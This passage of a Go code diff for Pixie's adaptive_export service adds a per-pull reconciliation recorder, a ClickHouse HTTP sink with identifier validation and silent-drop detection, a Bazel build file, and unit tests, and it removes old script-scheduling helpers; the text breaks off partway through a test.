+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package reconcile is the per-pull write-fidelity instrument for AE
+// (gated by ADAPTIVE_RECONCILE). It is a LEAF package — it imports none
+// of AE's other internal packages, so passthrough / controller / streaming
+// can all depend on it and the sink can implement it with no import cycle.
+//
+// Each data-plane pull records ONE Row: how many rows AE READ back from
+// Pixie for a (table, pod, window), and how many it WROTE to ClickHouse.
+// Reconciliation then localizes any loss to a single hop:
+// - read < px-direct PEM count → query/window/filter miss (hop R5)
+// - wrote < read → sink/batch drop (hop R6)
+// - CH distinct > read → re-pull duplication (C8, quantified)
+//
+// The records land in forensic_db.ae_reconcile (see the CH-backed Recorder
+// in the sink package). Best-effort: a failed reconcile write is logged,
+// never fatal, and never blocks the data path.
+package reconcile
+
+import (
+ "context"
+ "time"
+)
+
+// Row is one per-pull reconciliation record.
+type Row struct {
+ TS time.Time // when AE finished this pull
+ Mode string // "filter" | "passthrough" | "streaming"
+ Table string // pixie table, e.g. "conn_stats"
+ Namespace string // target ns ("" for unfiltered passthrough/streaming)
+ Pod string // target pod ("" for unfiltered)
+ WinStart time.Time // PxL slice lower bound (time_ >= WinStart)
+ WinEnd time.Time // PxL slice upper bound (time_ < WinEnd)
+ ReadCount int64 // rows Pixie returned for this pull
+ WroteCount int64 // rows AE sent to CH (0 on write failure / empty)
+ WriteErr string // query or sink error, "" on success
+ Hostname string // node name
+}
+
+// Recorder persists reconciliation Rows. Implementations MUST be
+// best-effort and non-blocking-on-failure (the data path must never stall
+// because reconciliation logging failed).
+type Recorder interface {
+ Record(ctx context.Context, r Row)
+}
+
+// Nop is the disabled-flag Recorder. It drops every Row.
+type Nop struct{}
+
+// Record implements Recorder.
+func (Nop) Record(context.Context, Row) {}
diff --git a/src/vizier/services/adaptive_export/internal/script/script.go b/src/vizier/services/adaptive_export/internal/script/script.go
index 23005ec8851..b44fb7aeb0f 100644
--- a/src/vizier/services/adaptive_export/internal/script/script.go
+++ b/src/vizier/services/adaptive_export/internal/script/script.go
@@ -16,24 +16,9 @@
package script
-import (
- "fmt"
- "strings"
-)
-
-const (
- scriptPrefix = "ch-"
-)
-
-type ScriptConfig struct {
- ClusterName string
- ClusterId string
- CollectInterval int64
-}
-
type Script struct {
ScriptDefinition
- ScriptId string
+ ScriptID string
ClusterIds string
}
@@ -44,71 +29,3 @@ type ScriptDefinition struct {
Script string `yaml:"script"`
IsPreset bool `yaml:"-"`
}
-
-type ScriptActions struct {
- ToDelete []*Script
- ToUpdate []*Script
- ToCreate []*Script
-}
-
-func IsClickHouseScript(scriptName string) bool {
- return strings.HasPrefix(scriptName, scriptPrefix)
-}
-
-func IsScriptForCluster(scriptName, clusterName string) bool {
- return IsClickHouseScript(scriptName) && strings.HasSuffix(scriptName, "-"+clusterName)
-}
-
-func GetActions(scriptDefinitions []*ScriptDefinition, currentScripts []*Script, config ScriptConfig) ScriptActions {
- definitions := make(map[string]ScriptDefinition)
- for _, definition := range scriptDefinitions {
- scriptName := getScriptName(definition.Name, config.ClusterName)
- frequencyS := getInterval(definition, config)
- if frequencyS > 0 {
- definitions[scriptName] = ScriptDefinition{
- Name: scriptName,
- Description: definition.Description,
- FrequencyS: frequencyS,
- Script: templateScript(definition, config),
- }
- }
- }
- actions := ScriptActions{}
- for _, current := range currentScripts {
- if definition, present := definitions[current.Name]; present {
- if definition.Script != current.Script || definition.FrequencyS != current.FrequencyS || config.ClusterId != current.ClusterIds {
- actions.ToUpdate = append(actions.ToUpdate, &Script{
- ScriptDefinition: definition,
- ScriptId: current.ScriptId,
- ClusterIds: config.ClusterId,
- })
- }
- delete(definitions, current.Name)
- } else if IsClickHouseScript(current.Name) {
- actions.ToDelete = append(actions.ToDelete, current)
- }
- }
- for _, definition := range definitions {
- actions.ToCreate = append(actions.ToCreate, &Script{
- ScriptDefinition: definition,
- ClusterIds: config.ClusterId,
- })
- }
- return actions
-}
-
-func getScriptName(scriptName string, clusterName string) string {
- return fmt.Sprintf("%s%s-%s", scriptPrefix, scriptName, clusterName)
-}
-
-func getInterval(definition *ScriptDefinition, config ScriptConfig) int64 {
- if definition.FrequencyS == 0 {
- return config.CollectInterval
- }
- return definition.FrequencyS
-}
-
-func templateScript(definition *ScriptDefinition, config ScriptConfig) string {
- // Return script as-is without any processing
- return definition.Script
-}
diff --git a/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel
new file mode 100644
index 00000000000..277372892dd
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel
@@ -0,0 +1,50 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "sink",
+ srcs = [
+ "clickhouse.go",
+ "fastencode.go",
+ ],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/chhttp",
+ "//src/vizier/services/adaptive_export/internal/clickhouse",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
+ "@com_github_sirupsen_logrus//:logrus",
+ ],
+)
+
+pl_go_test(
+ name = "sink_test",
+ srcs = [
+ "clickhouse_test.go",
+ "content_type_contract_test.go",
+ "encode_bench_test.go",
+ "fastencode_test.go",
+ ],
+ embed = [":sink"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/clickhouse",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go
new file mode 100644
index 00000000000..e5fc6130a71
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go
@@ -0,0 +1,501 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package sink writes operator-owned rows to ClickHouse over the HTTP
+// interface (default port 8123). It has two write surfaces:
+//
+// 1. forensic_db.adaptive_attribution — one row per arriving kubescape
+// anomaly. ReplacingMergeTree(t_end) on the table side collapses
+// re-inserts with the same (hostname, anomaly_hash) primary key
+// into the row with the largest t_end.
+//
+// 2. forensic_db. — operator-pushed pixie observation rows
+// (rev-1 fan-out path, gated on ADAPTIVE_PUSH_PIXIE_ROWS=true).
+// Used when Pixie's cloud-side retention plugin can't reach an
+// in-cluster CH endpoint; the operator queries pixie itself and
+// writes the result with WritePixieRows.
+package sink
+
+import (
+ "bufio"
+ "bytes"
+ "context"
+ "encoding/json"
+ "errors"
+ "fmt"
+ "io"
+ "regexp"
+ "strconv"
+ "strings"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
+)
+
+// pixieTableIdentRE accepts plain CH identifiers and dotted protobuf
+// extensions like `http2_messages.beta`. Used to gate `table` strings
+// before they're interpolated into the INSERT query.
+var pixieTableIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$`)
+
+// chIdentRE — strict CH identifier (no dots). Used to gate Database
+// (and any future single-segment identifier) against SQL injection
+// from env/config-driven values.
+var chIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)
+
+func validateTableIdentifier(t string) error {
+ if !pixieTableIdentRE.MatchString(t) {
+ return fmt.Errorf("sink: invalid table identifier %q", t)
+ }
+ return nil
+}
+
+// Config configures a ClickHouseHTTP sink.
+type Config struct {
+ Endpoint string // e.g. http://clickhouse:8123
+ Database string // defaults to "forensic_db"
+ Username string // optional basic auth
+ Password string // optional basic auth
+ Timeout time.Duration // per-write HTTP timeout; 0 → 30s
+}
+
+// AttributionRow is one row of forensic_db.adaptive_attribution.
+// All fields are required except LastRuleID.
+type AttributionRow struct {
+ AnomalyHash anomaly.AnomalyHash
+ Namespace string // may be empty
+ Pod string // may be empty
+ Comm string
+ PID uint64
+ Hostname string
+ TStart time.Time
+ TEnd time.Time
+ LastSeen time.Time
+ LastRuleID string
+ NAnomalies uint64
+}
+
+// ClickHouseHTTP is the production sink.
+type ClickHouseHTTP struct {
+ cfg Config
+ c *chhttp.Client
+}
+
+// New validates Config + returns a ready-to-use sink.
+func New(cfg Config) (*ClickHouseHTTP, error) {
+ if cfg.Database == "" {
+ cfg.Database = "forensic_db"
+ }
+ // Database is interpolated directly into INSERT/SELECT statements
+ // (used in WriteAttribution, WritePixieRows, QueryActive). Block
+ // injection via env/config-supplied values.
+ if !chIdentRE.MatchString(cfg.Database) {
+ return nil, fmt.Errorf("sink: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database)
+ }
+ // http.Client.Timeout enforces only when >0; a negative value
+ // would silently disable the deadline. Reject explicitly so the
+ // "0 → chhttp default" branch is the only zero-handling path.
+ if cfg.Timeout < 0 {
+ return nil, fmt.Errorf("sink: Timeout must be >= 0 (got %s)", cfg.Timeout)
+ }
+ c, err := chhttp.New(cfg.Endpoint, cfg.Username, cfg.Password, cfg.Timeout)
+ if err != nil {
+ return nil, fmt.Errorf("sink: %w", err)
+ }
+ cfg.Endpoint = c.Endpoint()
+ return &ClickHouseHTTP{cfg: cfg, c: c}, nil
+}
+
+// WritePixieRows POSTs a batch of arbitrary rows (one map per CH row,
+// keyed by column name) into forensic_db. via FORMAT JSONEachRow.
+// Used by the operator's per-anomaly fan-out path that queries pixie
+// directly and pushes the resulting rows into CH (bypasses the cloud's
+// retention plugin, which can't reach an in-cluster CH endpoint).
+func (s *ClickHouseHTTP) WritePixieRows(ctx context.Context, table string, rows []map[string]any) error {
+ if len(rows) == 0 {
+ return nil
+ }
+ if err := validateTableIdentifier(table); err != nil {
+ return err
+ }
+ // Pooled buffer (option 1) — controller fan-out + streaming flush
+ // call this on a tight cadence, so reusing the backing array across
+ // calls cuts the per-call B/op cost by ~70 % once the pool stabilises
+ // (the bench BenchmarkEncodePixieRowsFast_Pooled tracks the steady
+ // state). buf.Reset() preserves the cap on Put so the next caller
+ // gets a warm allocation.
+ buf := encodeBufPool.Get().(*bytes.Buffer)
+ buf.Reset()
+ defer func() {
+ // Avoid hoarding pathologically large buffers. The pixie batch
+ // upper bound is ~MaxBatchRows * ~900 B/row ≈ 1 MB; anything
+ // over 2 MB came from a one-off oversize batch and shouldn't
+ // stay in the pool eating heap.
+ if buf.Cap() > 2*1024*1024 {
+ return
+ }
+ encodeBufPool.Put(buf)
+ }()
+ // Fast path: known table → walk rows in schema column order, no
+ // reflect, no map-key sort. The fast encoder's CPU + alloc profile
+ // is ~3 % of the encoding/json path (AE benchmark suite); it's the
+ // hot path for every controller fan-out + streaming flush.
+ // errFastEncodeUnsupported falls back so an unexpected value type
+ // can't silently drop a row. ErrUnknownTable falls back so a new
+ // pixie table not yet in schema.sql still works (just slower).
+ if err := encodePixieRowsFast(buf, table, rows); err != nil {
+ if !errors.Is(err, errFastEncodeUnsupported) && !errors.Is(err, clickhouse.ErrUnknownTable) {
+ return fmt.Errorf("sink: fast encode %s: %w", table, err)
+ }
+ buf.Reset()
+ enc := json.NewEncoder(buf)
+ enc.SetEscapeHTML(false)
+ for _, r := range rows {
+ obj := make(map[string]any, len(r))
+ for k, v := range r {
+ obj[k] = normalisePixieValue(v)
+ }
+ if err := enc.Encode(obj); err != nil {
+ return fmt.Errorf("sink: encode pixie row for %s: %w", table, err)
+ }
+ }
+ }
+ identifier := table
+ if strings.Contains(table, ".") {
+ identifier = "`" + table + "`"
+ }
+ res, err := s.c.Insert(ctx,
+ fmt.Sprintf("INSERT INTO %s.%s FORMAT JSONEachRow", s.cfg.Database, identifier),
+ buf.Bytes(), chhttp.InsertOptions{FailLoud: true})
+ if err != nil {
+ return fmt.Errorf("sink: pixie POST %s: %w", table, err)
+ }
+ // DEBUG: ALWAYS log what CH says it wrote — temporary while we
+ // chase the pgsql_events silent-drop mystery. Includes a snippet
+ // of the first row so we can compare what was sent vs what CH
+ // reported.
+ summary := res.Summary
+ var firstRowKeys []string
+ if len(rows) > 0 {
+ for k := range rows[0] {
+ firstRowKeys = append(firstRowKeys, k)
+ }
+ }
+ log.WithFields(log.Fields{
+ "table": table,
+ "rows_sent": len(rows),
+ "body_bytes": buf.Len(),
+ "ch_summary": summary,
+ "first_row_keys": strings.Join(firstRowKeys, ","),
+ }).Info("sink: pixie write completed")
+ // Detect the silent-drop class: CH returns 2xx but
+ // X-ClickHouse-Summary.written_rows < len(rows). Observed live on
+ // 2026-05-23T20:58Z (redis_events: rows_sent=1658, written_rows=0)
+ // — the operator reported success and the analyst saw the gap days
+ // later. Header absence is tolerated (older CH versions / proxies
+ // strip it); only an EXPLICIT zero-of-non-zero counts.
+ if writeMismatch := summaryWroteFewerThan(summary, len(rows)); writeMismatch != nil {
+ return fmt.Errorf("sink: pixie write to %s reported %d rows_sent but CH summary written_rows=%d (silent drop): %s",
+ table, len(rows), writeMismatch.writtenRows, summary)
+ }
+ return nil
+}
+
+// summaryDelta carries the parsed write counters from CH's
+// X-ClickHouse-Summary response header.
+type summaryDelta struct {
+ writtenRows int64
+}
+
+// summaryWroteFewerThan returns non-nil when the X-ClickHouse-Summary
+// header is present, parseable, and reports written_rows < rowsSent.
+// Returns nil when the header is missing, unparseable, or the count
+// matches/exceeds rowsSent — those are not data-loss signals.
+func summaryWroteFewerThan(summary string, rowsSent int) *summaryDelta {
+ if summary == "" {
+ return nil
+ }
+ var parsed struct {
+ WrittenRows json.Number `json:"written_rows"`
+ }
+ if err := json.Unmarshal([]byte(summary), &parsed); err != nil {
+ return nil
+ }
+ if parsed.WrittenRows == "" {
+ return nil
+ }
+ wrote, err := parsed.WrittenRows.Int64()
+ if err != nil {
+ return nil
+ }
+ if wrote >= int64(rowsSent) {
+ return nil
+ }
+ return &summaryDelta{writtenRows: wrote}
+}
+
+// normalisePixieValue coerces pxapi-emitted Go values into JSON-friendly
+// shapes ClickHouse parses cleanly. time.Time → "YYYY-MM-DD HH:MM:SS.NNN…"
+// (CH's DateTime64 input format); []byte → string; everything else → as-is.
+func normalisePixieValue(v any) any {
+ switch x := v.(type) {
+ case time.Time:
+ return x.UTC().Format("2006-01-02 15:04:05.000000000")
+ case []byte:
+ return string(x)
+ default:
+ return v
+ }
+}
+
+// Write upserts a batch of AttributionRows. Implementation: HTTP POST
+// `INSERT INTO forensic_db.adaptive_attribution FORMAT JSONEachRow`
+// with one JSON object per row. Empty batch is a no-op.
+func (s *ClickHouseHTTP) Write(ctx context.Context, rows []AttributionRow) error {
+ if len(rows) == 0 {
+ return nil
+ }
+ body, err := encodeJSONEachRow(rows)
+ if err != nil {
+ return fmt.Errorf("sink: encode %d attribution rows: %w", len(rows), err)
+ }
+ if _, err := s.c.Insert(ctx,
+ fmt.Sprintf("INSERT INTO %s.adaptive_attribution FORMAT JSONEachRow", s.cfg.Database),
+ body, chhttp.InsertOptions{FailLoud: true}); err != nil {
+ return fmt.Errorf("sink: POST: %w", err)
+ }
+ return nil
+}
+
+// chTimeFmt is the ClickHouse DateTime64 literal format used for every
+// time column AE writes (see Write/encodeJSONEachRow and fastencode.go).
+const chTimeFmt = "2006-01-02 15:04:05.000000000"
+
+// Record implements reconcile.Recorder: it inserts ONE per-pull
+// reconciliation row into forensic_db.ae_reconcile. Best-effort by
+// contract — any failure is logged at warn and swallowed so the
+// reconcile instrument can NEVER stall or fail the data path.
+func (s *ClickHouseHTTP) Record(ctx context.Context, r reconcile.Row) {
+ ts := r.TS
+ if ts.IsZero() {
+ ts = time.Now()
+ }
+ obj := map[string]any{
+ "ts": ts.UTC().Format(chTimeFmt),
+ "mode": r.Mode,
+ "table_name": r.Table,
+ "namespace": r.Namespace,
+ "pod": r.Pod,
+ "win_start": r.WinStart.UTC().Format(chTimeFmt),
+ "win_end": r.WinEnd.UTC().Format(chTimeFmt),
+ "read_count": r.ReadCount,
+ "wrote_count": r.WroteCount,
+ "write_err": r.WriteErr,
+ "hostname": r.Hostname,
+ }
+ body, err := json.Marshal(obj)
+ if err != nil {
+ log.WithError(err).Warn("reconcile: marshal row")
+ return
+ }
+ // Cap Record at recordTimeout regardless of the caller's ctx —
+ // scanner/passthrough/controller call this inline on hot paths, so a
+ // stalled CH must not pin the pull loop on the shared 30s sink
+ // timeout (CodeRabbit r3426923299). 2s is well above CH's typical
+ // single-row INSERT roundtrip (~50ms in steady state) and below the
+ // pull loop's minimum tick interval.
+ rctx, cancel := context.WithTimeout(ctx, recordTimeout)
+ defer cancel()
+ if _, err := s.c.Insert(rctx,
+ fmt.Sprintf("INSERT INTO %s.ae_reconcile FORMAT JSONEachRow", s.cfg.Database),
+ body, chhttp.InsertOptions{}); err != nil {
+ log.WithError(err).Warn("reconcile: CH rejected ae_reconcile insert")
+ }
+}
+
+// recordTimeout caps how long Record can block the caller's hot path.
+const recordTimeout = 2 * time.Second
+
+// QueryActive fetches all attribution rows on this hostname whose t_end
+// is still in the future. Used by the operator at boot to rehydrate
+// the in-memory active set after a pod crash. Returns rows ordered
+// by anomaly_hash so the caller's set is deterministic.
+func (s *ClickHouseHTTP) QueryActive(ctx context.Context, hostname string) ([]AttributionRow, error) {
+ if hostname == "" {
+ return nil, fmt.Errorf("sink: QueryActive requires hostname")
+ }
+ // `FINAL` collapses ReplacingMergeTree to the row with the largest
+ // t_end (because the engine's version column is t_end).
+ // We escape hostname inside the SQL via simple ClickHouse-style
+ // quoting (single quote, no backslash escapes).
+ sql := fmt.Sprintf(
+ "SELECT anomaly_hash, namespace, pod, comm, pid, hostname, "+
+ "toUnixTimestamp64Nano(t_start) AS t_start_ns, "+
+ "toUnixTimestamp64Nano(t_end) AS t_end_ns, "+
+ "toUnixTimestamp64Nano(last_seen) AS last_seen_ns, "+
+ "last_rule_id, n_anomalies "+
+ "FROM %s.adaptive_attribution FINAL "+
+ "WHERE hostname = %s AND t_end > now64(9) "+
+ "ORDER BY anomaly_hash FORMAT JSONEachRow",
+ s.cfg.Database, quoteCH(hostname))
+ body, err := s.c.QueryStream(ctx, sql)
+ if err != nil {
+ return nil, fmt.Errorf("sink: QueryActive: %w", err)
+ }
+ defer body.Close()
+ // Stream the response line-by-line so the per-call buffer is
+ // bounded by max_line_length, not by the total active-set size.
+ return parseActiveRowsStream(body)
+}
+
+// chLiteralEscaper escapes a string for ClickHouse single-quoted literals.
+// Hoisted to a package-level var so we don't allocate a Replacer per call
+// — quoteCH runs in the per-row write path.
+var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`)
+
+// quoteCH wraps a string literal for safe ClickHouse SQL embedding.
+func quoteCH(s string) string {
+ return "'" + chLiteralEscaper.Replace(s) + "'"
+}
+
+func encodeJSONEachRow(rows []AttributionRow) ([]byte, error) {
+ var buf bytes.Buffer
+ enc := json.NewEncoder(&buf)
+ enc.SetEscapeHTML(false)
+ for _, r := range rows {
+ obj := map[string]any{
+ "anomaly_hash": string(r.AnomalyHash),
+ "namespace": r.Namespace,
+ "pod": r.Pod,
+ "comm": r.Comm,
+ "pid": r.PID,
+ "hostname": r.Hostname,
+ "t_start": r.TStart.UTC().Format("2006-01-02 15:04:05.000000000"),
+ "t_end": r.TEnd.UTC().Format("2006-01-02 15:04:05.000000000"),
+ "last_seen": r.LastSeen.UTC().Format("2006-01-02 15:04:05.000000000"),
+ "last_rule_id": r.LastRuleID,
+ "n_anomalies": r.NAnomalies,
+ }
+ if err := enc.Encode(obj); err != nil {
+ return nil, err
+ }
+ }
+ return buf.Bytes(), nil
+}
+
+// activeWireRow mirrors the JSONEachRow shape emitted by QueryActive.
+// json.RawMessage on UInt64 fields lets us tolerate CH's two wire
+// formats (`12345` and `"12345"`).
+type activeWireRow struct {
+ AnomalyHash string `json:"anomaly_hash"`
+ Namespace string `json:"namespace"`
+ Pod string `json:"pod"`
+ Comm string `json:"comm"`
+ PID json.RawMessage `json:"pid"`
+ Hostname string `json:"hostname"`
+ TStartNs json.RawMessage `json:"t_start_ns"`
+ TEndNs json.RawMessage `json:"t_end_ns"`
+ LastSeenNs json.RawMessage `json:"last_seen_ns"`
+ LastRuleID string `json:"last_rule_id"`
+ NAnomalies json.RawMessage `json:"n_anomalies"`
+}
+
+// parseActiveRowsStream ingests JSONEachRow output from QueryActive
+// directly from a reader so the per-call buffer is bounded by
+// `max_active_row_bytes` (per row) rather than by the entire active
+// set. Mirrors trigger.parseJSONEachRow's streaming posture.
+func parseActiveRowsStream(r io.Reader) ([]AttributionRow, error) {
+ const maxActiveRowBytes = 1 << 20 // 1 MiB per JSONEachRow line
+ scanner := bufio.NewScanner(r)
+ scanner.Buffer(make([]byte, 0, 64*1024), maxActiveRowBytes)
+ var out []AttributionRow
+ for scanner.Scan() {
+ line := bytes.TrimSpace(scanner.Bytes())
+ if len(line) == 0 {
+ continue
+ }
+ row, err := parseActiveRowLine(line)
+ if err != nil {
+ return nil, err
+ }
+ out = append(out, row)
+ }
+ if err := scanner.Err(); err != nil {
+ return nil, fmt.Errorf("sink: QueryActive scan: %w", err)
+ }
+ return out, nil
+}
+
+// parseActiveRowLine decodes a single JSONEachRow line into one
+// AttributionRow. Used by parseActiveRowsStream and accessible to
+// tests via parseActiveRows.
+func parseActiveRowLine(line []byte) (AttributionRow, error) {
+ var w activeWireRow
+ if err := json.Unmarshal(line, &w); err != nil {
+ // Don't echo the raw line — it can carry CH row payloads
+ // that propagate to logs / surfaced errors. Length only.
+ return AttributionRow{}, fmt.Errorf("sink: parse active row (%d bytes): %w", len(line), err)
+ }
+ ts, err1 := nsFromRaw(w.TStartNs)
+ te, err2 := nsFromRaw(w.TEndNs)
+ ls, err3 := nsFromRaw(w.LastSeenNs)
+ pid, errPID := uintFromRaw(w.PID)
+ nAn, errN := uintFromRaw(w.NAnomalies)
+ if err1 != nil || err2 != nil || err3 != nil || errPID != nil || errN != nil {
+ return AttributionRow{}, fmt.Errorf("sink: parse uint64 fields: t_start=%v t_end=%v last_seen=%v pid=%v n_anomalies=%v", err1, err2, err3, errPID, errN)
+ }
+ return AttributionRow{
+ AnomalyHash: anomaly.AnomalyHash(w.AnomalyHash),
+ Namespace: w.Namespace,
+ Pod: w.Pod,
+ Comm: w.Comm,
+ PID: pid,
+ Hostname: w.Hostname,
+ TStart: time.Unix(0, ts).UTC(),
+ TEnd: time.Unix(0, te).UTC(),
+ LastSeen: time.Unix(0, ls).UTC(),
+ LastRuleID: w.LastRuleID,
+ NAnomalies: nAn,
+ }, nil
+}
+
+// parseActiveRows is the byte-slice convenience wrapper around
+// parseActiveRowsStream — kept for tests and e2e fixtures that have
+// already buffered the full response.
+func parseActiveRows(body []byte) ([]AttributionRow, error) {
+ return parseActiveRowsStream(bytes.NewReader(body))
+}
+
+// nsFromRaw parses a CH UInt64-as-JSON value (CH may emit either
+// `12345` or `"12345"`) into an int64. Used for time_ columns.
+func nsFromRaw(raw json.RawMessage) (int64, error) {
+ s := strings.TrimSpace(string(raw))
+ s = strings.Trim(s, `"`)
+ v, err := strconv.ParseInt(s, 10, 64)
+ return v, err
+}
+
+// uintFromRaw is the uint64 equivalent — covers values above INT64_MAX
+// for fields like PID and NAnomalies that are documented uint64 in CH.
+func uintFromRaw(raw json.RawMessage) (uint64, error) {
+ s := strings.TrimSpace(string(raw))
+ s = strings.Trim(s, `"`)
+ return strconv.ParseUint(s, 10, 64)
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go
new file mode 100644
index 00000000000..0eb42adcc76
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go
@@ -0,0 +1,588 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package sink
+
+import (
+ "bytes"
+ "context"
+ "fmt"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+func canonicalAttribution() AttributionRow {
+ t0 := time.Unix(0, 1744477360303026359).UTC()
+ return AttributionRow{
+ AnomalyHash: anomaly.Hash(anomaly.Target{
+ PID: 106040, Comm: "redis-server",
+ Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis",
+ }),
+ Namespace: "redis",
+ Pod: "redis-578d5dc9bd-kjj78",
+ Comm: "redis-server",
+ PID: 106040,
+ Hostname: "node-1",
+ TStart: t0.Add(-5 * time.Minute),
+ TEnd: t0.Add(5 * time.Minute),
+ LastSeen: t0,
+ LastRuleID: "R1005",
+ NAnomalies: 1,
+ }
+}
+
+// TestSink_Write_PostsCorrectQueryAndBody — INSERT targets the right
+// table; body is one JSON object per line with all attribution fields.
+func TestSink_Write_PostsCorrectQueryAndBody(t *testing.T) {
+ var gotQuery, gotBody string
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ gotQuery = r.URL.Query().Get("query")
+ b, _ := io.ReadAll(r.Body)
+ gotBody = string(b)
+ w.WriteHeader(200)
+ }))
+ defer srv.Close()
+
+ s, err := New(Config{Endpoint: srv.URL})
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ row := canonicalAttribution()
+ if err := s.Write(context.Background(), []AttributionRow{row}); err != nil {
+ t.Fatalf("Write: %v", err)
+ }
+ want := "INSERT INTO forensic_db.adaptive_attribution FORMAT JSONEachRow"
+ if gotQuery != want {
+ t.Fatalf("query = %q, want %q", gotQuery, want)
+ }
+ for _, needle := range []string{
+ `"anomaly_hash":"` + string(row.AnomalyHash) + `"`,
+ `"namespace":"redis"`,
+ `"pod":"redis-578d5dc9bd-kjj78"`,
+ `"comm":"redis-server"`,
+ `"pid":106040`,
+ `"hostname":"node-1"`,
+ `"last_rule_id":"R1005"`,
+ `"n_anomalies":1`,
+ } {
+ if !strings.Contains(gotBody, needle) {
+ t.Fatalf("body missing %q; body=%s", needle, gotBody)
+ }
+ }
+ if !strings.Contains(gotBody, `"t_start":"2025-04-12 16:57:40.303026359"`) {
+ t.Fatalf("t_start not formatted as DateTime64 string; body=%s", gotBody)
+ }
+}
+
+// TestSink_Write_EmptyBatch — no HTTP call.
+func TestSink_Write_EmptyBatch(t *testing.T) {
+ called := false
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ called = true
+ }))
+ defer srv.Close()
+ s, _ := New(Config{Endpoint: srv.URL})
+ if err := s.Write(context.Background(), nil); err != nil {
+ t.Fatalf("Write empty: %v", err)
+ }
+ if called {
+ t.Fatalf("empty Write made an HTTP call")
+ }
+}
+
+// TestSink_Write_HTTPErrorPropagates — non-2xx returns Go error.
+func TestSink_Write_HTTPErrorPropagates(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ w.WriteHeader(503)
+ _, _ = w.Write([]byte("clickhouse exploded"))
+ }))
+ defer srv.Close()
+ s, _ := New(Config{Endpoint: srv.URL})
+ err := s.Write(context.Background(), []AttributionRow{canonicalAttribution()})
+ if err == nil {
+ t.Fatalf("expected HTTP error")
+ }
+ if !strings.Contains(err.Error(), "503") {
+ t.Fatalf("error should mention 503: %v", err)
+ }
+}
+
+// TestSink_QueryActive_BuildsCorrectSQL — boot rehydration query.
+func TestSink_QueryActive_BuildsCorrectSQL(t *testing.T) {
+ var seenQuery string
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ seenQuery = r.URL.Query().Get("query")
+ _, _ = w.Write([]byte(`{"anomaly_hash":"abc","namespace":"redis","pod":"redis-x","comm":"redis-server","pid":106040,"hostname":"node-1","t_start_ns":"1744477060303026359","t_end_ns":"1744477660303026359","last_seen_ns":"1744477360303026359","last_rule_id":"R1005","n_anomalies":1}` + "\n"))
+ }))
+ defer srv.Close()
+ s, _ := New(Config{Endpoint: srv.URL})
+ rows, err := s.QueryActive(context.Background(), "node-1")
